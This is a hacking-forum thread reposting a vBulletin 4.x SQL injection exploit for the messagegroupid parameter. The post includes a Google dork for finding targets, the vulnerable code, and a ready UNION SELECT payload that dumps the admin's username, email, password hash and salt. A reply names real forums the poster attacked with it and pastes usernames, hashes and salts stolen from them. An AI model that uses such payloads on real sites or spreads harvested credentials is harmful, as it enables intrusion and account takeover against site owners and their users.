Jump to content
Nytro

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

Recommended Posts

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S
# Software Link: [[url]http://www.vbulletin.com/][/url]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [[url=http://members.vbulletin.com/]]Please Log In[/url]

######################################################################################################
Vulnerability:
######################################################################################################

Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.

#####################################################################################################
Vulnerable Code:
#####################################################################################################

File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid




if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)

{

$value = $registry->GPC['messagegroupid'];

if (!is_array($value))

{

$value = array($value);

}



if (!(in_array(' ',$value) OR in_array('',$value)))

{

if ($rst = $vbulletin->db->query_read("

SELECT socialgroup.name

FROM " . TABLE_PREFIX."socialgroup AS socialgroup

---> WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")


}



############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
--> Search Single Content Type

Keywords : Valid Group Message

Search Type : Group Messages

Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

##########################################################################################
More Details:
##########################################################################################
[url]Http://www.Garage4Hackers.com[/url]
[url=http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day]Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day[/url]


###########################################################################################
Note:
###########################################################################################

Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".

Sursa: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

Link to comment
Share on other sites

scz ca fac reclama , dar pe extremecs.ro/forum , forum.gameszone.ro , Nu mere Exploitu , mai incerc si pe altele.. ca's o gramada

edit : am reusit

Admin:5bf6785b83c4c9ba1d509e36b84b33e1:28)y5P:#Hg9)sllsoOT#D3@6, MASTER_007:2024d1917fbace5acfa274cd955bd5dc:C~w7}jI]NI@e54D=LdXX`a5%^BzNL7,

http://www.crewforum.ro/

Edited by XandZero
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...